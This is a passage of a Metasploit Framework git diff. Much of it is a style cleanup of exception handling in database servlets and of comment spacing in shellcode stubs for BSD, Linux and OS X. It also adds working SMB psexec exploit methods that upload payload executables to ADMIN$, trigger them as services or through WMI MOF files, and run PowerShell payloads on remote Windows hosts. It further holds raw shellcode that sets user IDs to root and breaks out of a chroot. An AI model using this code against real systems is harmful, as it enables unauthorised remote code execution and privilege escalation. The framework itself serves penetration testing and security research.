set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -40,7 +40,7 @@ module VulnServlet
get_db.report_vuln(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -54,7 +54,7 @@ module VulnServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_vuln(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -66,7 +66,7 @@ module VulnServlet
opts = parse_json_request(request, false)
data = get_db.delete_vuln(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

8
lib/msf/core/db_manager/http/servlet/workspace_servlet.rb
View File

@ -29,7 +29,7 @@ module WorkspaceServlet
data = get_db.workspaces(sanitized_params)
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -41,7 +41,7 @@ module WorkspaceServlet
opts = parse_json_request(request, true)
workspace = get_db.add_workspace(opts)
set_json_response(workspace)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -55,7 +55,7 @@ module WorkspaceServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_workspace(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -67,7 +67,7 @@ module WorkspaceServlet
opts = parse_json_request(request, false)
data = get_db.delete_workspaces(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

2
lib/msf/core/db_manager/http/servlet_helper.rb
View File

@ -47,7 +47,7 @@ module ServletHelper
return set_json_response(data, includes)
end
rescue Exception => e
rescue => e
set_error_on_response(e)
end
end

245
lib/msf/core/exploit/smb/client/psexec.rb
View File

@ -2,6 +2,8 @@
require 'rex/proto/dcerpc/svcctl'
require 'windows_error'
require 'windows_error/win32'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/wbemexec'
include WindowsError::Win32
@ -20,6 +22,7 @@ module Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Windows_Constants
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Failure
def initialize(info = {})
super
@ -193,6 +196,246 @@ module Exploit::Remote::SMB::Client::Psexec
true
end
end
def powershell_installed?(smb_share, psh_path)
share = "\\\\#{datastore['RHOST']}\\#{smb_share}"
case smb_share.upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = psh_path
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def execute_command(text, bat, cmd)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
vprint_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay, rt)
res = execute_command(text, bat, cmd)
if res
for i in 0..(rt)
Rex.sleep(delay)
# if the output file is still locked then the program is still likely running
if (exclusive_access(text, smb_share, r_ip))
break
elsif (i == rt)
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
output = get_output(text, smb_share, r_ip)
end
cleanup_after(bat, smb_share, r_ip)
output
end
def execute_powershell_payload
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload(smb_share)
filename = "#{rand_text_alpha(8)}.exe"
serviceencoder = ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = smb_share
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = smb_share.dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{filename}", 'rwct')
end
exe = ''
opts = { :servicename => service_name, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#{filename}...")
else
print_status("Created \\#{filename}...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if smb_share == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#{filename}"
elsif smb_share =~ /^[a-zA-Z]\$$/
file_location = smb_share.slice(0,1) + ":\\#{filename}"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#{filename}...")
#This is not really useful but will prevent double \\ on the wire :)
if smb_share =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{filename}")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{filename} failed: #{e.message}")
end
end
end
end
def mof_upload(smb_share)
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if smb_share != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#{filename}", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#{filename}")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
private
# Retrive output from command
def get_output(file, smb_share, r_ip)
print_status("Getting the command output...")
output = smb_read_file(smb_share, r_ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
output
end
# check if our process is done using these files
def exclusive_access(*files, smb_share, r_ip)
begin
simple.connect("\\\\#{r_ip}\\#{smb_share}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
print_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
end
return true
end
def cleanup_after(*files, smb_share, r_ip)
begin
simple.connect("\\\\#{r_ip}\\#{smb_share}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
)} from the target.")
return
end
print_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end
end

78
lib/msf/core/payload/bsd.rb
View File

@ -93,69 +93,69 @@ module Msf::Payload::Bsd
def handle_x64_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" +# shl rax, 2
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" + # shl rax, 2
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" +# shl rax, 1
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" + # shl rax, 1
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end

80
lib/msf/core/payload/bsd/x86.rb
View File

@ -59,70 +59,70 @@ module X86
def handle_x86_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end

208
lib/msf/core/payload/linux.rb
View File

@ -99,113 +99,113 @@ module Msf::Payload::Linux
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
pre << "\x6a\x02" + # pushb $0x2 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 ; fork #
"\x85\xc0" + # test %eax,%eax #
"\x74\x06" + # jz 0xf #
"\x31\xc0" + # xor %eax,%eax #
"\xb0\x01" + # movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xa4" + # movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x17" + # pushl $0x17 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xaa" + # movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x47" + # pushl $0x47 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x2e" + # pushl $0x2e #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
pre << "\x6a\x3d" + # pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
"\x89\xe3" + # movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x6a\x27" + # pushl $0x27 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
"\x89\xe3" + # movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
"\x6a\x3d" + # pushl $0x1e #
"\x59" + # popl %ecx #
"\xb0\x0c" + # movb $0xc,%al #
"\xcd\x80" + # int $0x80 #
"\xe2\xfa" + # loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
"\x6a\x3d" + # pushl $0x3d #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
app << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x01" + # pushl $0x01 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
@ -216,65 +216,65 @@ module Msf::Payload::Linux
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
# EEK! unsupported...
end
@ -282,10 +282,10 @@ module Msf::Payload::Linux
# Append exit(0)
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
app << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
elsif (test_arch.include?(ARCH_X64))

118
lib/msf/core/payload/osx.rb
View File

@ -78,48 +78,48 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
